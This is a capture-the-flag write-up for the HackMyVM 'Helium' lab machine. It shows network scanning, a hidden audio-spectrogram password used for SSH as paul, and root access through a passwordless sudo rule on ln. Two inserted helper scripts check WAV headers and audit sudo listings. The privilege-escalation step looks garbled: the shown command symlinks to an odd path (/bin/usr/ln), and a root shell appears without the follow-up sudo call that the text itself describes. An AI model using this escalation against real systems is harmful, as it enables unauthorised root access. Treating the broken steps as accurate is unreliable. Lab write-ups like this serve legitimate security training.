
HackmyVM-Helium

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.178 08:00:27:d1:eb:7a PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.217 b4:0f:b3:8e:31:07 vivo Mobile Communication Co., Ltd.
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 5 responded

The target is 192.168.31.178 (the VirtualBox NIC). Scan all TCP ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.178 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-26 01:27 EST
Nmap scan report for helium (192.168.31.178)
Host is up (0.0046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D1:EB:7A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds

Port 80

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.178
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
background-image: url('screen-1.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100% 100%;
}
</style>
<link href="bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
</body>

The HTML comment names paul, so that is probably the SSH username. relax.wav, once downloaded, contains nothing useful, but /bootstrap.min.css does not return a stylesheet at all: it serves a .wav file. Opening that file in Audacity and switching the track to spectrogram view reveals the text dancingpassyo. Trying it as paul's SSH password works and the login succeeds.
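The writeup does not show how to confirm that the file served at /bootstrap.min.css is audio before loading it into Audacity. As an added example, not part of the original writeup, the POSIX-shell function below checks the RIFF/WAVE magic and reads the sample rate, channel count and bit depth from the header using only dd, od and tr; `make_sample_wav` writes a constructed two-sample WAV so the check can be run offline. The function assumes the canonical layout in which the fmt chunk sits at offset 12; a valid WAV that puts a LIST or other chunk first would be rejected.

```shell
#!/bin/sh
# Added example, not from the original writeup: recognise a RIFF/WAVE file that
# is being served under a misleading name (here a ".css" URL) and read its
# basic format fields with POSIX tools only (dd, od, tr).

# wav_info FILE
# Returns 0 and prints "rate=<Hz> channels=<n> bits=<n>" when FILE begins with
# the canonical WAV header "RIFF....WAVEfmt "; returns 1 for anything else.
# Assumption: the fmt chunk is at offset 12 (the usual layout written by most
# encoders; a file with a LIST chunk first is valid WAV but is rejected here).
wav_info() {
    f=$1
    riff=$(dd if="$f" bs=1 count=4 2>/dev/null)
    wave=$(dd if="$f" bs=1 skip=8 count=4 2>/dev/null)
    fmt=$(dd if="$f" bs=1 skip=12 count=4 2>/dev/null)
    [ "$riff" = "RIFF" ] && [ "$wave" = "WAVE" ] && [ "$fmt" = "fmt " ] || return 1
    # Little-endian fields of the fmt chunk:
    #   offset 22 channels (u16), 24 sample rate (u32), 34 bits per sample (u16)
    channels=$(od -An -tu2 -j22 -N2 "$f" | tr -d ' ')
    rate=$(od -An -tu4 -j24 -N4 "$f" | tr -d ' ')
    bits=$(od -An -tu2 -j34 -N2 "$f" | tr -d ' ')
    echo "rate=$rate channels=$channels bits=$bits"
}

# make_sample_wav FILE
# Writes a constructed, minimal 8000 Hz mono 16-bit WAV holding two silent
# samples (44-byte header + 4 data bytes), for testing without a network.
make_sample_wav() {
    printf 'RIFF\050\000\000\000WAVEfmt \020\000\000\000\001\000\001\000\100\037\000\000\200\076\000\000\002\000\020\000data\004\000\000\000\000\000\000\000' > "$1"
}

# On the target the check would be:
#   curl -s http://192.168.31.178/bootstrap.min.css -o bootstrap.min.css
#   wav_info bootstrap.min.css && echo "not a stylesheet: open it in Audacity"
```

`file bootstrap.min.css` gives the same yes/no answer in one command; the function is useful when you want the format fields in a script, for example to decide whether a spectrogram is worth looking at before sending the file to a human.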

Privilege escalation

paul@MiWiFi-RA71-srv:~$ sudo -l
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
Matching Defaults entries for paul on MiWiFi-RA71-srv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on MiWiFi-RA71-srv:
(ALL : ALL) NOPASSWD: /usr/bin/ln
paul@MiWiFi-RA71-srv:~$ sudo ln  -fs /bin/sh /bin/usr/ln
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
# id
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation succeeded. The rule lets paul run ln as root with no password, and ln can create or replace any file on the system. The listing above also shows that sudo searches /usr/bin and /bin via secure_path, so pointing a binary name there at /bin/sh with a root-run `ln -fs` means the next `sudo` invocation of that name executes a shell as root. The "unable to resolve host MiWiFi-RA71-srv" lines are only sudo failing to resolve the machine's hostname; they do not affect the commands.
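To make the mechanism concrete, here is an added example, not part of the original writeup: the script audits a captured `sudo -l` listing for NOPASSWD commands, checks whether such a command lives in a directory on sudo's secure_path (which is what makes replacing it with a symlink to /bin/sh effective), and reproduces the symlink step unprivileged in a scratch directory so the PATH hijack can be observed without touching the real /usr/bin/ln. The listing is the one shown above, embedded as the constant `SUDO_L`; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a captured `sudo -l`
# listing for passwordless commands, and show unprivileged why a root
# "ln -fs /bin/sh <dir on secure_path>/ln" hands over a root shell.

# Constructed input: the sudo -l listing from the writeup, embedded verbatim.
SUDO_L='Matching Defaults entries for paul on MiWiFi-RA71-srv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on MiWiFi-RA71-srv:
    (ALL : ALL) NOPASSWD: /usr/bin/ln'

# nopasswd_cmds LISTING -> prints each NOPASSWD command path on its own line
nopasswd_cmds() {
    printf '%s\n' "$1" | sed -n 's/.*NOPASSWD: *//p'
}

# secure_path LISTING -> prints the directories of sudo's secure_path, one per
# line (sudo -l shows the separators escaped as "\:")
secure_path() {
    printf '%s\n' "$1" | sed -n 's/.*secure_path=\([^ ,]*\).*/\1/p' \
        | sed 's/\\:/:/g' | tr ':' '\n'
}

# on_secure_path LISTING CMD -> 0 when CMD lives in a directory sudo searches.
# A root-run ln can then replace CMD with a symlink to /bin/sh, and the next
# "sudo <name>" executes that shell as root.
on_secure_path() {
    secure_path "$1" | grep -qx "$(dirname "$2")"
}

# demo_ln_hijack DIR -> reproduces the symlink step without privileges: a link
# named "ln" pointing at /bin/sh is put at the front of PATH, and the function
# prints what a later bare "ln" resolves to (DIR/bin/ln, whose target is /bin/sh).
demo_ln_hijack() {
    mkdir -p "$1/bin"
    ln -fs /bin/sh "$1/bin/ln"          # the step the writeup runs via sudo
    ( PATH="$1/bin:$PATH"; hash -r; command -v ln )
}

# Usage on a live box:  listing=$(sudo -l); nopasswd_cmds "$listing"
```

The audit functions are deliberately dumb text filters over `sudo -l` output, which is what you have during an engagement; on the defensive side the same question is answered by reviewing /etc/sudoers and /etc/sudoers.d for NOPASSWD rules on file-manipulating tools, since any of them (ln, cp, mv, tee) can rewrite a binary on secure_path.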